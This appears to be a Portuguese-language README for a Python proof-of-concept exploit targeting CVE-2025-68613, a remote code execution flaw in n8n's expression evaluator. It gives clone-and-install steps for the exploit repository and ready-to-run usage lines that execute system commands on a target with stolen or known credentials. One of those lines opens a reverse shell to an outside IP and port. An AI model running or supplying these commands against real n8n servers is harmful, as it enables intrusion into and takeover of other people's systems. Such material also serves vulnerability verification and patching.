
Exploit em Python para CVE-2025-68613.
Exploit de Prova de Conceito (PoC) para uma vulnerabilidade crítica de Execução Remota de Código na plataforma de automação de workflows n8n.
A vulnerabilidade existe no sistema de avaliação de expressões do n8n. As expressões fornecidas pelo utilizador não são devidamente isoladas em sandbox, permitindo que atacantes autenticados executem código arbitrário no sistema anfitrião.
ID do CVE: CVE-2025-68613
Tipo de Vulnerabilidade: Execução Remota de Código (RCE)
Componente: Avaliador de Expressões
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]
-t, --target : URL do alvo (ex.: http://localhost:5678)-u, --username : Endereço de e-mail da conta n8n-p, --password : Senha da conta n8n-c, --cmd : Comando do sistema a executar--reverse-shell : Acionar uma reverse shell (Formato: IP PORT)python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444